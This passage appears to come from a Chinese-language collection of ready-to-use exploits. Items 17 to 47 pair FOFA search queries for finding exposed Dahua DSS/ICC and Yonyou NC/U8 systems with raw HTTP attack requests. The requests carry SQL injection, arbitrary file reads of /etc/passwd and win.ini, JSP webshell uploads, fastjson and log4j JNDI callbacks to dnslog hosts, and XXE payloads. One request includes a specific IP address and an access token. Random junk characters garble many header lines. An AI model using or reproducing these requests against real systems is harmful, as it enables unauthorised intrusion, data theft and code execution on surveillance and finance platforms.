User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
- k+ i* |( \* \/ @Accept: */*
7 I. r7 N4 n" _, HAccept-Language: en
; w: C( U; v  SAccept-Encoding: gzip

$ r8 T: `, q% P  @2 |  L% ]% b
17. 大华 DSS itcBulletin SQL 注入
FOFA：app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
/ d1 e$ d7 q' i6 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 v% {" a! r8 s+ j# M9 gConnection: close
: N# B7 p5 R' W1 O0 QContent-Length: 345
Accept-Encoding: gzip
. T! T0 n5 _6 @% o2 s4 h' z4 {2 E
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
4 P/ E1 t9 K  I  </s11:Body>
/ G2 r6 w$ ]4 E2 p5 L- Q) v</s11:Envelope>
0 x6 m8 I8 h; t- X* S* I0 g
' U( N' S0 p, G8 X* e; d
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
FOFA：app="dahua-DSS"
; L0 G$ G. Y; ~' ]. k0 |GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
$ ]2 g6 J* o+ G7 j; W1 P+ @* c$ h: }Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. I" c! t: F/ l4 J# {5 e* }! mAccept-Encoding: gzip, deflate
Accept: */*
1 k( h+ I" v2 z8 X9 ], g) BConnection: keep-alive

$ n0 F( R# I- A

19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
/ g# w! `; ?3 Q# X6 X$ |2 h5 Q5 K) Z# LFOFA：app="dahua-DSS"
5 i: ^# D6 o+ e3 C' |7 n+ O+ t" YGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
- @5 Y5 g! {: Q0 ?0 BAccept: */*
Connection: keep-alive
) o: j/ t. J1 b3 @5 d

20. 大华ICC智能物联综合管理平台任意文件读取
/ v- b5 P7 I& J+ |4 w) fFOFA：body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
) B8 Y6 z) L# E+ M, n. U" XHost: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 l, U8 Z, D+ V/ f# o  S$ ]& `Connection: close
Accept: */*
/ W( F5 v7 q. A0 Z0 B8 ~* BAccept-Language: en
) d( ?3 T9 I8 t; L" TAccept-Encoding: gzip


21. 大华ICC智能物联综合管理平台random远程代码执行
FOFA：icon_hash="-1935899595"
& x8 }; Z1 R; |" qPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
$ H  C6 _3 ?! o4 mHost: x.x.x.x
: r4 ]- Y: z3 Q& yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
" f) \. c4 ^* D) OAccept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8
' E/ z' V% a9 b5 @- ]- U
{
"a":{
6 e6 E7 C4 B8 N* N! P/ E   "@type":"com.alibaba.fastjson.JSONObject",
1 W9 |$ l: {, p" j5 V6 G    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
; l# u; k, @4 K' b' @+ B  }""
}


22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. X2 W$ Y0 ^9 s1 kFOFA：icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! E! k9 R9 u4 N+ i4 k1 ]; B# rContent-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
4 I, n8 F" `5 [- {}

) P5 u) L8 o1 j1 k; e# V
' j% Q. U. b2 D; V, b" r
" b% c; K+ p! C: [+ C23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
FOFA：icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! n" e- R8 |9 {: D" g+ N9 H( L% tHost: your-ip
- G5 u& m. ?  g1 T  ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, u6 e" H2 y: \. Y+ _Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close
: X2 H8 k$ p# S; }' P' d/ o# _& u4 ]
. l+ `4 B) `) W. [{
1 F, ]9 R, a4 O  z- I2 p    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
% q- ]3 W! k4 U7 d       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
9 v+ T  B% k" y( Z1 p}

# D0 a: E5 E5 `! {5 ?, O' ]
24. 用友NC 6.5 accept.jsp任意文件上传
FOFA：icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
  u  M( F1 f% o2 [" mHost: x.x.x.x
+ S& ^( M1 k8 u5 i% W0 v6 mUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
# r5 e. p( F9 |Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
5 W- R! N; m) K7 n
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain
" V2 s1 Q+ A2 Z6 q- p# C6 @
7 T% W, R$ I8 @$ B5 [<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
+ D, N2 Q8 g! t4 A8 {9 p-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"
: y  x0 G7 f6 k1 B
3 O' @; {$ j" {: G3 k+ n( z\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
% N- _. ]) m% Q" M-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
, b% K" Y& U/ o& ]
5 i' z4 K' `+ ?- ~' J1 ?5 W
3 D: O, B8 U& j( a25. 用友NC registerServlet JNDI 远程代码执行
, d7 X2 L3 z2 K2 `FOFA：app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
2 R( v% J. }/ ?8 \/ G8 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
" K9 W3 Z! q# J3 w! b2 _0 m9 @Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

1 u6 P& U! y' v; N6 p4 x" [type=1&dsname=ldap://dnslog
% L+ V% W3 u" C& ^& _7 z
( ?# ]2 |1 O1 C7 y

26. 用友NC linkVoucher SQL注入
1 B5 k0 A7 y/ J& D- y! WFOFA：app="用友-UFIDA-NC"
0 i/ M! Y' W3 N6 r* HGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
: R+ h& t0 X& TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
4 b. a( U0 p  g% I9 P" ]+ A  j! ]Connection: keep-alive
* i  x  w' H; E* `! A$ g8 w

27. 用友 NC showcontent SQL注入
FOFA：icon_hash="1085941792"
; Z# B$ {1 w' ~# d6 QGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
: T7 t$ u; t' B# B  m* W1 iHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 {' `8 T9 U; X9 g) uAccept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

5 q6 E, w& B3 S+ y5 x
# {8 {( b2 U+ K; B0 y28. 用友NC grouptemplet 任意文件上传
0 }# _# l% u3 a# M$ U4 TFOFA：icon_hash="1085941792"
. H& H; s* \6 x& a" XPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
/ y- u' b+ _' NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
& I2 F: ^, q; s  B; IContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip
5 o! y/ b% }+ s5 f) u' r& ]
* E6 Z8 k& v3 Y2 ~0 o8 ~* c------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
' \' K% }; ^/ U' L9 `. S9 GContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream
9 ]' a: B  d7 x/ z' s1 M
9 Q4 P" u7 O' `0 t; Q8 G<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


  T5 J; K! T7 e: p/uapim/static/pages/nc/head.jsp

1 `$ r  P" t8 k4 @7 [29. 用友NC down/bill SQL注入
, `( M; A* U9 S# e7 {FOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
" h0 |7 w1 H1 v7 SHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
2 E0 [, d" U) dAccept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

! y' }- `7 l5 d+ R3 Z
6 ?, w2 m4 U' n4 w5 s6 l30. 用友NC importPml SQL注入
8 Y4 h  K9 a7 g: oFOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
) p0 C  o- l* F3 G2 w- G/ G2 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

) A& x; }% w0 Z/ U) K2 U$ ^------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
! U, \- {8 K, S/ @6 t------WebKitFormBoundaryH970hbttBhoCyj9V--
* P) \( h. t9 c5 D% Y6 Q
, V; u1 z; y8 k2 H  u. u. D: t
' K5 n: W) V/ o4 M% q  z31. 用友NC runStateServlet SQL注入
, {% r- E0 F! Hversion<=6.5
# E+ a! r6 W9 v/ L5 X1 C5 HFOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"
5 ~: ~5 j3 y- t- l. z$ p; r& b$ i  OGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
, W9 o; e% ^# W& x5 u; Q4 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

# Z% r# f* N. b7 j
32. 用友NC complainbilldetail SQL注入
version= NC633、NC65
) Q- a& `# t% N! Z+ m: k$ jFOFA：app="用友-UFIDA-NC"
( D( G3 J7 P0 k( w) J) H4 `: Y6 ^GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 p2 i( Y& @; nHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 V) }7 y( y# @0 v( D9 F; Z3 lContent-Type: application/x-www-form-urlencoded
0 b2 J0 V) ]) j, `7 y- {- ~- A% m1 LAccept-Encoding: gzip, deflate
: w- w* l0 g7 A( Z  i" F7 ^5 {9 h' ^Accept: */*
+ o$ j- i5 i4 @, o1 aConnection: keep-alive

( v6 a% z. g& C
33. 用友NC downTax/download SQL注入
version：NC6.5FOFA：app="用友-UFIDA-NC"
" J5 m5 e+ Q/ ~3 RGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  x1 R5 e0 n7 n/ A+ Y- uContent-Type: application/x-www-form-urlencoded
% G. z* b0 z* H4 |Accept-Encoding: gzip, deflate
, V0 E) a& N$ ?, e) D' m& OAccept: */*
) e6 N, j2 I6 i7 Q% E3 zConnection: keep-alive
7 T( q: h9 y& R) L  E  g
3 G! c) Q; V8 i# }+ u
34. 用友NC warningDetailInfo接口SQL注入
; J+ A$ ?6 H0 `0 e& ^% Z/ y+ FFOFA：app="用友-UFIDA-NC"
2 P# B+ n$ X: S. N, vGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 P: k6 R( l% G/ K( `" nHost: your-ip
/ @/ r. v+ P% K+ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
2 L& p: E4 n3 `  q7 J. PAccept: */*
1 S; ]- D1 ], h8 t2 {Connection: keep-alive

6 |  W% F1 Q# k6 W9 {% V8 l& M
35. 用友NC-Cloud importhttpscer任意文件上传
FOFA：app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
/ R) Z; h! x& q! tHost: 203.25.218.166:8888
% i8 h* Z* X4 T% N- |- F" IUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
+ z. W; p6 N# T& R, BConnection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
7 ], z- X( B% V# f! E( QContent-Length: 190
9 Z8 _) Y4 U$ BContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
* s! ]$ M* j5 B* o* Z* ~3 g- |/ W
- a' ?8 a7 v& S! b' r# V$ ]% `--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

% n7 X& o5 [/ q<%out.println(1111*1111);%>
- m+ x* q; r/ }8 L4 w" L* o--fd28cb44e829ed1c197ec3bc71748df0--
4 r+ ~/ T, t( c0 @" x
/ Y0 w- s3 c3 U6 n
36. 用友NC-Cloud soapFormat XXE
FOFA：body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ o0 }, U: l% B: JPOST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
3 @$ D( u- {6 D- S% f: yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
. u) k. j. V* b) _+ vContent-Length: 263
7 Z- M+ l% S# [* `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( D3 ^6 C6 ?0 |4 BAccept-Encoding: gzip, deflate
; j; b" E" u/ s  H7 d( B1 ]3 P3 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
1 B' b% `! B- e0 e/ a( ?( XContent-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
' k, k* ~7 k0 `1 r9 M8 f
7 P  @/ E, x9 V, a) I' w0 k$ fmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
8 N1 i2 [& d$ n& [4 j" @

37. 用友NC-Cloud IUpdateService XXE
, I# L, b/ z- |$ Y/ y; a9 l' }FOFA：body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
. o5 t, Q4 M: r: o& t* S, rHost: 192.168.40.130:8989
+ v. ]4 @! T' T, D" E  F0 g+ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: B" k* j% t# q5 R3 OAccept-Encoding: gzip, deflate
7 S% E, C# q5 H% ZAccept-Language: zh-CN,zh;q=0.9
Connection: close
; J& [9 @. n6 }+ kContent-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

, W8 \( o; H2 x. H! v<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
3 B+ K6 s& H% k9 m<soapenv:Header/>
8 X$ v4 Y6 G# ~. l3 H* [' z; k<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
2 ^  }: \+ E4 c$ l<xxx/>]]></iup:string>
' _+ P3 p. }* J% D! i</iup:getResult>
6 x# v2 U- Q$ {. ~1 U9 x; Q</soapenv:Body>
</soapenv:Envelope>



38. 用友U8 Cloud smartweb2.RPC.d XXE
5 }/ N% x# T$ Q- ~  L1 YFOFA：app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
6 v. E$ K+ c8 N7 C7 BHost: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
' j2 e5 S# L4 q. r8 s2 k4 L" K; eContent-Length: 260
1 c, R4 h5 ?" a, cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
0 e# S+ p! q. o7 ?+ ~' h# X: cAccept-Language: zh-CN,zh;q=0.9
Connection: close
7 S& I; M! g: UContent-Type: application/x-www-form-urlencoded
4 i1 N" B# P" Y
- l" {' p8 c1 R# Y# X- B; {* x: p1 S__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


" h. L9 m8 k. Y9 r8 k' a39. 用友U8 Cloud RegisterServlet SQL注入
FOFA：title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
$ e$ K, G; v9 y; B; K0 ?Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
  X0 Z/ M' H7 ]. l* t6 ~% c8 G/ o9 rContent-Length: 85
Accept: */*
8 q: ?. j4 c2 L$ fAccept-Language: en
" y5 h0 k% o* mContent-Type: application/x-www-form-urlencoded
" f) Y/ e% S' |( o1 a3 H' NX-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

/ ?! g. j# c8 Musercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+ f( U4 o; P) C; W" f; F" j

1 ]* q& z/ q3 e7 t1 z3 h2 s# d7 t0 y40. 用友U8-Cloud XChangeServlet XXE
$ ^9 F" Q1 ?8 E' d! x( ZFOFA：app="用友-U8-Cloud"
) R+ Z& I; s" E/ H% k/ DPOST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 B) x# {  ?3 ^Content-Type: text/xml
$ ~$ H8 w8 h8 R1 F! h/ lConnection: close

  l( F: W* R& ~8 ?! T9 A<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
) j8 o0 f5 t* C" N; K, Z4 ^% n

41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
* R- G5 f" I7 k8 n: O- I- dFOFA：app="用友-U8-Cloud"
1 o. s0 {  X! M1 OGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
8 [9 B4 e( n5 E2 a% @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
# O! ~" x) V4 q+ B  c9 nConnection: close
& q0 ~% f; Q; {

42. 用友GRP-U8 SmartUpload01 文件上传
6 v+ K0 E* M6 EFOFA：app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
% T% ^) ?7 c% s; ^Host: x.x.x.x
: x- ?# X. w2 \5 @4 ]9 mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

$ W7 u# k/ j, x1 IPAYLOAD
; M9 S' P7 d2 X

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

- K& @5 H* K% _3 ?8 Y5 [1 r- A43. 用友GRP-U8 userInfoWeb SQL注入致RCE
9 \3 c! r1 E. f( T+ [$ {4 w; ^FOFA：app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
5 ?9 ?4 k3 b* F. K* R+ Q/ oHost: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 V0 @) U$ i" s3 x' A$ sAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
6 W& }$ V. ^5 K2 ~- C: z) |: eConnection: close
SOAPAction:
* W' |7 X. Q  V3 S" F  KContent-Type: text/xml;charset=UTF-8
! S- k+ T; U$ f1 E- r0 H0 O& e
/ t9 k7 W0 z/ |/ l: M* }<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
0 u9 W) E3 e9 `+ k# G$ n   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
9 F- j  ^0 r; x; L5 i   </soapenv:Body>
</soapenv:Envelope>
1 @3 Y% I' R- X% l0 i' _7 P

44. 用友GRP-U8 bx_dj_check.jsp SQL注入
# m7 m2 K0 a& {% V; f  J2 w7 hFOFA:app="用友-GRP-U8"
, V8 P5 g, i5 b! @0 [) n# xGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
# F+ E- o6 r$ E; i- ?, f. FHost: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- n' h, O/ R# s* r. j! iAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
  ~# F" u4 F; }2 lConnection: close
* L+ V0 Q! }% k: X* y# K) h

% P0 O% ~( |. u/ l8 l45. 用友GRP-U8 ufgovbank XXE
FOFA：app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
  e& R8 Y& r/ V( k$ {Host: 192.168.40.130:222
0 l# A3 I/ r5 L7 `9 h/ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
2 _4 y! {2 m  x1 [Content-Length: 161
. |* K. a# C8 d8 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ i7 A* a# B, D: G# dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! s6 l% Y6 M$ B  s" c# aContent-Type: application/x-www-form-urlencoded
2 r. k! h' \! |Accept-Encoding: gzip
) m2 r4 Z: u0 N) U6 [6 f8 z
reqData=<?xml version="1.0"?>
) {- |3 `. {  Q0 s2 U7 v( c<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

! y0 W0 G4 _6 {. L9 _
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
! z& n( V' q& N3 U+ AFOFA：app="用友-GRP-U8"
9 X# N+ u. x6 t8 _GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
3 z+ ~/ Y* `1 I, h% \* I1 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
. ^: s' g5 H/ ?  N% U  gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
4 [) \; r& z- ?' l4 P- L  TConnection: close

* Z" y- G, D! u  i- ?
$ g1 A& b; q" j$ z' }) X; |# O47. 用友GRP A++Cloud 政府财务云 任意文件读取
FOFA：body="/pf/portal/login/css/fonts/style.css"
: f0 j2 Y' \2 ~8 jGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
  W5 {8 R8 j8 F1 o  ^  D3 KHost: x.x.x.x
5 M+ |, }8 _6 t( \Cache-Control: max-age=0
6 N: N: B7 v# Q& D& X/ d5 J! }Upgrade-Insecure-Requests: 1
